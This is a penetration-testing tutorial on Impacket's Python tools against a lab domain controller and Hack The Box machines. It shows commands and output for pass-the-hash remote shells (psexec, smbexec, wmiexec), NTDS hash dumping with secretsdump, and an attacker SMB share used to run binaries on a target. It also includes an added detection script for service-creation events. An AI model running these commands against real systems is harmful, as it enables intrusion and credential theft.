Impacket is a collection of Python classes for working with network protocols. It focuses on providing low-level programmatic access to the packets and, for some protocols (e.g. SMB1-3 and MSRPC), to the protocol implementation itself. According to the Core Security website, Impacket supports IP, TCP, UDP, ICMP, IGMP, ARP, IPv4, IPv6, SMB, MSRPC, NTLM, Kerberos, WMI, LDAP, etc.
For the following practical we will require two systems:
- A Windows Server with Domain Controller Configured
- A Kali Linux
In our lab scenario the systems are configured as follows.
Windows Server Details
- Domain: SERVER
- User: Administrator
- Password: T00r
- IP Address: 192.168.1.140
Kali Linux: 192.168.1.135
Before beginning with the Impacket tools, let's run an Nmap version scan against the target Windows server to learn which services it is running.
nmap -sV 192.168.1.140
As you can see in the above screenshot, the host exposes DNS (reported by Nmap as domain), Kerberos, NetBIOS, LDAP and Windows RPC services, i.e. the usual profile of a domain controller.
Now let’s install the Impacket tools from GitHub. You can get it from here.
First clone the repository, then install Impacket as shown in the screenshot:
git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
python setup.py install
On newer Impacket releases, pip install . from inside the checkout is the supported install method; the example scripts are also installed on the PATH with an impacket- prefix (e.g. impacket-smbserver, used further below).
This installs Impacket on your Kali Linux. After installation, let's look at the different tools Impacket has in its box:
cd impacket/examples
These are some of the tools included in Impacket; let's try a few of them.
Ping.py
Simple ICMP ping that uses ICMP echo and echo-reply packets to check whether a host is up. If the remote host is up, it replies to the echo probe with an echo-reply packet. The script builds the packets itself on a raw socket, so it has to be run as root.
./ping.py
Syntax: ./ping.py [Source IP] [Destination IP]
./ping.py 192.168.1.135 192.168.1.140
Lookupsid.py
A Windows SID bruteforcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.
./lookupsid.py
Syntax: ./lookupsid.py [[domain/] username [: password] @] [Target IP Address]
./lookupsid.py SERVER/Administrator:T00r@192.168.1.140
As you can see, the lookupsid tool extracted the user and group information from the server by resolving RIDs one by one, so the result is a full account list even though no enumeration right is needed beyond a valid logon.
Psexec.py
It lets you execute processes on remote Windows systems, copy files to them, process their output and stream it back. It gives a fully interactive console without installing any client software on the target. Under the hood it uploads a service binary with a random name to a writable share (ADMIN$ here) and creates a temporary service with a random name to run it, as the session below shows; both leave clear traces on the target.
./psexec.py
root@kali:~/htb/silo# python psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] Requesting shares on 10.10.10.82.....
[*] Found writable share ADMIN$
[*] Uploading file JbNIPTbN.exe
[*] Opening SVCManager on 10.10.10.82.....
[*] Creating service cKNz on 10.10.10.82.....
[*] Starting service cKNz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
Syntax: ./psexec.py [[domain/] username [: password] @] [Target IP Address]
./psexec.py SERVER/Administrator:T00r@192.168.1.140
As you can see in the screenshot, we got a remote shell on the server. Note: if the password contains a ! (for example as its last character, giving !@ just before the host), bash history expansion eats it and you get bash: !@192.168.178.200: event not found. Wrap the target in single quotes, disable history expansion with set +H, or leave the password out so the tool prompts for it.
Rpcdump.py
This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well-known endpoints.
./rpcdump.py
Syntax: ./rpcdump.py [[domain/] username [: password] @] [Target IP Address]
./rpcdump.py SERVER/Administrator:T00r@192.168.1.140
As you can see below, we have the list of RPC endpoints, including the dynamic high ports on which the interfaces are listening.
Samrdump.py
An application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.
./samrdump.py
Syntax: ./samrdump.py [[domain/] username [: password] @] [Target IP Address]
./samrdump.py SERVER/Administrator:T00r@192.168.1.140
Secretsdump.py
Dumps secrets from the remote machine without executing any agent there: SAM hashes, LSA secrets and cached credentials via the registry and, against a domain controller, the NTDS.DIT hashes through the DRSUAPI replication interface (this requires replication rights, which Domain Admins have). The -just-dc-ntlm switch used below restricts the output to the NTLM hashes of the domain accounts.

root@kali:~/htb/hercules# python secretsdump.py -just-dc-ntlm HTB.LOCAL/puckie@192.168.178.24
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
puckie:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
[*] Cleaning up...

Two values in this output are worth recognising on sight: the LM field aad3b435b51404eeaad3b435b51404ee means no LM hash is stored (the modern default), and the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of an empty password (Guest and DefaultAccount here, both disabled by default). Any NT hash in this list can be used directly with the -hashes option of psexec.py, smbexec.py or wmiexec.py.
SMBexec.py
It gives a semi-interactive shell. It does not upload a binary or install an agent on the target: each command is run through a service created on the fly, and its output is read back over SMB. Nothing persists on the target afterwards, but every command creates a service, which Windows records in the System log (event 7045), so it is not silent. The shell runs as SYSTEM, as the whoami output below shows.
./smbexec.py
E:\OSCP>smbexec -hashes 566EFC084E3FCCB7B4DF6D823C906E54:566EFC084E3FCCB7B4DF6D823C906E54 administrator@192.168.178.24
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
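The random service and binary names in the psexec.py session above, and the on-the-fly service that smbexec.py uses, are also what a defender hunts for: both tools install a service, which the target records as System log event 7045 with the service name and ImagePath. The block below is an added example, not part of this page or of Impacket, that scans constructed 7045 records for those patterns. The psexec.py pattern (4-letter service name, 8-letter random .exe placed under %systemroot%, i.e. the ADMIN$ share) follows the output above; the smbexec.py details (service name BTOBTO, output redirected to \\127.0.0.1\C$\__output, a %TEMP%\execute.bat helper) are assumed from the smbexec.py source of that era and may differ in other releases. The log lines are constructed, not real telemetry.

```python
"""Flag 7045 service-creation records that look like psexec.py / smbexec.py (added example)."""
import re

# Constructed System-log records, one per line: key=value pairs with ImagePath quoted.
# Lines 2 and 3 mimic psexec.py and smbexec.py; lines 1 and 4 are benign Windows services.
SAMPLE_7045 = r'''
EventID=7045 ServiceName=Sense ImagePath="C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"
EventID=7045 ServiceName=cKNz ImagePath="%systemroot%\JbNIPTbN.exe"
EventID=7045 ServiceName=BTOBTO ImagePath="%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"
EventID=7045 ServiceName=Spooler ImagePath="C:\Windows\System32\spoolsv.exe"
'''

RECORD = re.compile(r'EventID=(?P<id>\d+)\s+ServiceName=(?P<name>\S+)\s+ImagePath="(?P<path>[^"]*)"')
PSEXEC_NAME = re.compile(r'^[A-Za-z]{4}$')                 # 4 random letters, e.g. cKNz
PSEXEC_PATH = re.compile(r'\\[A-Za-z]{8}\.exe$')           # 8 random letters, e.g. JbNIPTbN.exe
LOOPBACK_UNC = re.compile(r'\\\\127\.0\.0\.1\\\S+\$', re.IGNORECASE)  # \\127.0.0.1\C$ or \ADMIN$

# ASSUMED smbexec.py defaults of that era; adjust if your Impacket version differs.
SMBEXEC_SERVICE = "BTOBTO"
SMBEXEC_MARKERS = ("__output", "execute.bat")


def classify(name: str, path: str) -> str:
    """Return a verdict for one service name / ImagePath pair."""
    if PSEXEC_NAME.match(name) and PSEXEC_PATH.search(path):
        return "psexec.py-like"
    lowered = path.lower()
    if name == SMBEXEC_SERVICE or any(m in lowered for m in SMBEXEC_MARKERS):
        return "smbexec.py-like"
    # A service whose binary is a cmd.exe one-liner or points at a loopback UNC share is
    # not how legitimate software installs itself; flag it even if the tool is unknown.
    if LOOPBACK_UNC.search(path) or lowered.startswith("%comspec%"):
        return "suspicious-service-command"
    return "benign"


def scan(log: str) -> list:
    """Return (service name, verdict) for every non-benign 7045 record in the log text."""
    hits = []
    for line in log.splitlines():
        m = RECORD.search(line)
        if not m or m.group("id") != "7045":
            continue
        verdict = classify(m.group("name"), m.group("path"))
        if verdict != "benign":
            hits.append((m.group("name"), verdict))
    return hits


if __name__ == "__main__":
    for service, verdict in scan(SAMPLE_7045):
        print(f"{service:10} {verdict}")
```

wmiexec.py and atexec.py (below) create no service, so this check does not see them: the former spawns its commands from WmiPrvSE.exe, the latter through a scheduled task, and both leave their output file under ADMIN$, so hunting them needs process-creation and file telemetry rather than the System log.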
SMBserver.py
Starts a small SMB server on the Kali box that exports a local directory as a share; it is the usual way to get a tool onto the target or to pull files back over a UNC path. Run it from the directory you want to share:

root@kali:~/htb/dropzone/share# impacket-smbserver share ./
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed

On the target the share is reachable by UNC path, both to run a binary straight from it and to copy it over:

c:\windows\system32>\\10.10.14.19\share\whoami.exe
\\10.10.14.19\share\whoami.exe
NT AUTHORITY\SYSTEM

c:\windows\system32>copy \\10.10.14.19\share\whoami.exe
copy \\10.10.14.19\share\whoami.exe
        1 file(s) copied.

Recent Windows versions ship with SMB1 disabled, so start the server with SMB2 support or the client will not connect at all:

KALI htb/tally# impacket-smbserver share ./ -smb2support

Group Policy Editor: Enable insecure guest logons
Since the Windows 10 Fall Creators Update, guest (unauthenticated) access over SMB2 is disabled by default, so a Windows 10 client (LT-JACCO in this lab) refuses to open an anonymous impacket-smbserver share. You can change this in the local Group Policy Editor:
- In the Run box, type gpedit.msc
- Navigate to Computer Configuration\Administrative Templates\Network\Lanman Workstation
- Set "Enable insecure guest logons" to Enabled and select OK
Bear in mind that this weakens the client's SMB policy towards every server, not just yours. Newer Impacket releases let you avoid it: start the server with -username and -password and authenticate from the target with net use before accessing the share.
Sniff.py
Simple packet sniffer that uses the pcapy library to listen for packets in transit over the specified interface.
./sniff.py
Choose the interface by the number associated with it and sniffing starts. Like ping.py, it needs root because it opens the interface in promiscuous mode.
Sniffer.py
Simple packet sniffer that uses a raw socket to listen for packets in transit corresponding to the specified protocols.
./sniffer.py
The sniffer then monitors ICMP, TCP and UDP traffic; it also needs root for the raw socket.
Wmiexec.py
It gives a semi-interactive shell through Windows Management Instrumentation (DCOM over port 135 plus a dynamic high port). It does not install a service or agent on the target: each command is launched through the Win32_Process class and its output is read back from a temporary file on the ADMIN$ share. The shell runs in the context of the authenticating user, not as SYSTEM (note that whoami below returns silo\administrator). It is quieter than psexec.py because no service is created and nothing is written to the System log, but the command still shows up as a child process of WmiPrvSE.exe on the target.
./wmiexec.py
root@kali:~/htb/silo# python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
silo\administrator
Syntax: ./wmiexec.py [[domain/] username [: password] @] [Target IP Address]
./wmiexec.py SERVER/Administrator:T00r@192.168.1.140
As you can see below, we have a shell on the target server.
Wmiquery.py
It allows you to issue WQL queries and get descriptions of WMI objects on the target system.
./wmiquery.py
Syntax: ./wmiquery.py [[domain/] username [: password] @] [Target IP Address]
./wmiquery.py SERVER/Administrator:T00r@192.168.1.140
An example query at the WQL> prompt, listing logical disks with fewer than 209152 bytes free:
SELECT * FROM Win32_LogicalDisk WHERE FreeSpace < 209152
Atexec.py
This example executes a command on the target machine through the Task Scheduler service and returns its output: it registers a scheduled task that runs the command, writes the output to a temporary file under ADMIN$, fetches it back and removes the task again. Because it executes a single command per invocation, it takes the command as a final argument rather than opening a shell.
./atexec.py
Syntax: ./atexec.py [[domain/] username [: password] @] [Target IP Address] [Command]
./atexec.py SERVER/Administrator:T00r@192.168.1.140 systeminfo
getArch.py
This script connects to a target (or a list of targets) and determines the installed OS architecture by (ab)using a documented MSRPC feature; it needs no credentials, which makes it useful before choosing a 32- or 64-bit payload.
./getArch.py
Syntax: ./getArch.py -target [IP Address]
Command: ./getArch.py -target 192.168.1.140
Here we can see that the architecture of the target system is 64-bit
Ifmap
This script will bind to the target’s MGMT interface to get a list of interface IDs. It will use that list on top of another list of interfaces UUID and reports whether the interface is listed and/or listening.
Syntax: ./ifmap.py [Host IP Address] [Port]
./ifmap.py 192.168.1.140 135
./ifmap.py 192.168.1.140 49154
Port 135 is the endpoint mapper; 49154 is one of the dynamic RPC ports on which individual interfaces listen, which rpcdump.py lists for you.
mssqlclient.py
A TDS client for Microsoft SQL Server (SSL supported). It connects to the target instance using either a SQL login or Windows (NTLM/Kerberos) authentication and gives an interactive SQL shell. Running it without arguments prints its usage:

root@kali:~/htb/# python mssqlclient.py
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug] [-file FILE] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target

TDS client implementation (SSL supported).

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>

optional arguments:
  -h, --help            show this help message and exit
  -port PORT            target MSSQL port (default 1433)
  -db DB                MSSQL database instance (default None)
  -windows-auth         whether or not to use Windows Authentication (default False)
  -debug                Turn DEBUG output ON
  -file FILE            input file with commands to execute in the SQL shell

authentication:
  -hashes LMHASH:NTHASH NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter

Example: ./mssqlclient.py -windows-auth htb.local/mssql-svc@10.10.x.x
The -windows-auth switch is needed when the account is a domain user (as here) rather than a SQL login; without it the server rejects the logon.
Author: Jacco Straathof